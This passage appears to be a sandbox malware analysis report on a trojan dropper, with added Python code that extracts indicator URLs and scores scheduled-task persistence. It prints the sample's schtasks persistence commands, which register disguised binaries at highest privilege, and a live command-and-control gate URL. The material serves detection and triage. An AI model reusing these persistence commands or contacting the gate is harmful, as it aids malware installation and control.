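    "Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec8",
    "Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000014.00000002.1867548337.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic",
    "Source: blockfont.exe, 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru/auth/login",
    "Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://index.from.sh/pages/game.html",
]

ROW_RE = re.compile(
    r"^Source: (?P<proc>[^,]+),.*String found in binary or memory: (?P<url>\S+)$"
)

# Hosts that show up in .NET assemblies as XML namespace / claim-type URIs and
# are never contacted. Allowlist is an assumption for this example.
NAMESPACE_HOSTS = {"schemas.xmlsoap.org", "schemas.microsoft.com", "www.w3.org"}


def parse_rows(rows):
    """Return (process name, url) pairs; rows in another layout are skipped."""
    pairs = []
    for row in rows:
        m = ROW_RE.match(row)
        if m:
            pairs.append((m.group("proc"), m.group("url")))
    return pairs


def extract_iocs(rows):
    """Group URLs by host: which processes held them, which paths were seen,
    and whether one of them is a script endpoint with parameters (gate)."""
    hosts = {}
    for proc, url in parse_rows(rows):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if not host or host in NAMESPACE_HOSTS:
            continue
        entry = hosts.setdefault(host, {"processes": set(), "paths": set(), "gate": None})
        entry["processes"].add(proc)
        if parts.path and parts.path != "/":
            entry["paths"].add(parts.path)
        # Keep the gate path only; the query values change per beacon.
        if parts.query and re.search(r"\.(php|aspx?|jsp)$", parts.path):
            entry["gate"] = parts.path
    return hosts


def blocklist(hosts):
    """Hosts with a gate first, then the rest alphabetically."""
    return sorted(hosts, key=lambda h: (hosts[h]["gate"] is None, h))


if __name__ == "__main__":
    found = extract_iocs(REPORT_ROWS)
    for host in blocklist(found):
        e = found[host]
        print(host, "gate=%s" % e["gate"], sorted(e["paths"]), sorted(e["processes"]))
```

The truncated string http://go.mic is kept as a host with no path so it is not lost silently, but a truncated indicator is for manual review rather than a deny list. cp.sprinthost.ru is a hosting-panel login URL found in the same memory region; the function records it without calling it a gate, because whether it belongs on a deny list depends on the environment.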

            System Summary

            Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
            Source: C:\serversessionmonitor\blockfont.exe | File created: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe
            Source: C:\serversessionmonitor\blockfont.exe | File created: C:\Windows\RemotePackages\RemoteApps\8057c8f30c1a8e
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6857B
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D770BF
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6407E
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D8D00E
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D91194
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D802F6
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D63281
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6E2A0
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D76646
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D737C1
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D627E8
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D8070E
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D8473A
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6E8A0
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D84969
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6F968
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D76A7B
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D73A3C
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D80B43
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D8CB60
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D75C77
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D7FDFA
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D73D6D
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6ED14
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6DE6C
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6BE13
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D80F78
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D65F3C
            Source: C:\serversessionmonitor\blockfont.exe | Code function: 4_2_00007FFD9B8E3585
            Source: C:\serversessionmonitor\blockfont.exe | Code function: 4_2_00007FFD9B8EA155
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 20_2_00007FFD9B8D3585
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 20_2_00007FFD9B8DA155
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 22_2_00007FFD9B8F33E0
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 22_2_00007FFD9B8FD218
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 22_2_00007FFD9B8FD158
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 22_2_00007FFD9B9028A0
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 22_2_00007FFD9B903C6D
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 22_2_00007FFD9B8FB300
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 22_2_00007FFD9B8FB1A8
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 22_2_00007FFD9B8FA155
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 37_2_00007FFD9B8E3585
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Code function: 37_2_00007FFD9B8EA155
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: String function: 00D7E360 appears 52 times
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: String function: 00D7ED00 appears 31 times
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: String function: 00D7E28C appears 35 times
            Source: blockfont.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: qwhJcOiWbbUoQMvwnJNr.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: backgroundTaskHost.exe.4.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: 5P9EdUgv5r.exe, 00000000.00000003.1629891261.0000000006B8D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5P9EdUgv5r.exe
            Source: 5P9EdUgv5r.exe, 00000000.00000003.1631592664.0000000005624000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5P9EdUgv5r.exe
            Source: 5P9EdUgv5r.exe, 00000000.00000003.1631221587.0000000005622000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5P9EdUgv5r.exe
            Source: 5P9EdUgv5r.exe | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 5P9EdUgv5r.exe
            Source: 5P9EdUgv5r.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, pEliLlAg9VImohRyaFR.cs | Cryptographic APIs: 'TransformBlock'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, pEliLlAg9VImohRyaFR.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RjptLIiSqcughaqdf1L.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RjptLIiSqcughaqdf1L.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, pEliLlAg9VImohRyaFR.cs | Cryptographic APIs: 'TransformBlock'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, pEliLlAg9VImohRyaFR.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RjptLIiSqcughaqdf1L.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RjptLIiSqcughaqdf1L.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RiBMyj0Ypa1aKVey8Er.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.5P9EdUgv5r.exe.566f5a6.1.raw.unpack, RiBMyj0Ypa1aKVey8Er.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RiBMyj0Ypa1aKVey8Er.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RiBMyj0Ypa1aKVey8Er.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@38/21@1/1
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D66EC9 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D79E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
            Source: C:\serversessionmonitor\blockfont.exe | File created: C:\Program Files (x86)\windows portable devices\winlogon.exe
            Source: C:\serversessionmonitor\blockfont.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\blockfont.exe.log
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\7cebdd664cb9e6472b16d991171ee8e76033ae4b
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" "
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Command line argument: sfxname (0_2_00D7D5D4)
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Command line argument: sfxstime (0_2_00D7D5D4)
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Command line argument: STARTDLG (0_2_00D7D5D4)
            Source: 5P9EdUgv5r.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 5P9EdUgv5r.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\serversessionmonitor\blockfont.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (24 identical rows in the report)
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | File read: C:\Windows\win.ini
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: 5P9EdUgv5r.exe | ReversingLabs: Detection: 71%
            Source: 5P9EdUgv5r.exe | Virustotal: Detection: 61%
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | File read: C:\Users\user\Desktop\5P9EdUgv5r.exe
            Source: unknown | Process created: C:\Users\user\Desktop\5P9EdUgv5r.exe "C:\Users\user\Desktop\5P9EdUgv5r.exe"
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\serversessionmonitor\blockfont.exe "C:\serversessionmonitor\blockfont.exe"
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 9 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: unknown | Process created: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: unknown | Process created: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe "C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe"
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SearchApp.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe "C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe"
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\serversessionmonitor\blockfont.exe "C:\serversessionmonitor\blockfont.exe"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe "C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe"
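The 24 schtasks.exe invocations above are the persistence layer (the same count as the Win32_Process::Create calls logged for blockfont.exe): every dropped copy gets two MINUTE-interval tasks and one ONLOGON task with /rl HIGHEST, and three of the copies carry the names of Windows binaries (winlogon.exe, backgroundTaskHost.exe, SearchApp.exe) in directories where those binaries never live. The Python below is an added triage example, not code from Joe Sandbox or from the sample: it parses schtasks /create command lines as they appear in a process-creation log and scores each target path on exactly those properties. Seven of the 24 command lines are embedded as input; the table of legitimate directories is a small subset and is an assumption made for the example.

```python
import re

# Seven of the 24 schtasks command lines copied from the report's process tree.
COMMAND_LINES = [
    r'''schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f''',
    r'''schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 9 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /f''',
    r'''schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SearchApp.exe'" /f''',
    r'''schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f''',
]

# Where these Windows binaries legitimately live (lower-case prefixes).
# Deliberately small; an assumption for this example, extend for production.
SYSTEM_BINARIES = {
    "winlogon.exe": ("c:\\windows\\system32\\",),
    "backgroundtaskhost.exe": ("c:\\windows\\system32\\",),
    "searchapp.exe": ("c:\\windows\\systemapps\\",),
}

# schtasks options take either a double-quoted value or a bare token.
OPT_RE = re.compile(
    r'/(?P<key>tn|sc|mo|tr|rl)\s+(?:"(?P<quoted>[^"]*)"|(?P<bare>\S+))', re.IGNORECASE
)


def parse_schtasks(cmd):
    """Return the /create options as a dict, or None for other schtasks verbs."""
    if not re.search(r"\s/create\b", cmd, re.IGNORECASE):
        return None
    opts = {"force": bool(re.search(r"\s/f(\s|$)", cmd, re.IGNORECASE))}
    for m in OPT_RE.finditer(cmd):
        value = m.group("quoted") if m.group("quoted") is not None else m.group("bare")
        opts[m.group("key").lower()] = value
    if "tr" in opts:
        # The sample wraps the action path in single quotes inside the double quotes.
        opts["tr"] = opts["tr"].strip("'")
    if "mo" in opts:
        opts["mo"] = int(opts["mo"])
    return opts


def triage(cmds):
    """Group tasks by target path and collect the reasons each target is suspect."""
    by_target = {}
    for cmd in cmds:
        o = parse_schtasks(cmd)
        if not o or "tr" not in o:
            continue
        target = o["tr"].lower()
        entry = by_target.setdefault(target, {"tasks": [], "reasons": set()})
        entry["tasks"].append(o)
        name = target.rsplit("\\", 1)[-1]
        if name in SYSTEM_BINARIES and not target.startswith(SYSTEM_BINARIES[name]):
            entry["reasons"].add("system-name-outside-system-dir")
        if (o.get("rl") or "").upper() == "HIGHEST":
            entry["reasons"].add("runlevel-highest")
        sched = (o.get("sc") or "").upper()
        if sched == "MINUTE" and o.get("mo", 0) <= 15:
            entry["reasons"].add("minute-interval")
        if sched == "ONLOGON":
            entry["reasons"].add("onlogon")
    for entry in by_target.values():
        # Re-launch every few minutes plus re-launch at logon is the watchdog pattern.
        if {"minute-interval", "onlogon"} <= entry["reasons"]:
            entry["reasons"].add("interval+logon-pair")
    return by_target


def summarize(result):
    """(target, sorted reasons) tuples, most suspicious first."""
    return sorted(((t, sorted(e["reasons"])) for t, e in result.items()),
                  key=lambda item: (-len(item[1]), item[0]))


if __name__ == "__main__":
    for target, reasons in summarize(triage(COMMAND_LINES)):
        print(target, ", ".join(reasons))
```

The parser keys on option names rather than on shlex-style tokenising because the nested quoting in these command lines ("'path'") is exactly what a POSIX tokenizer mishandles. On a live host the same function can be fed the output of schtasks /query /fo csv /v or the Microsoft-Windows-TaskScheduler operational log; the scoring logic does not change.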
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: dxgidebug.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: sfc_os.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Section loaded: windowscodecs.dll
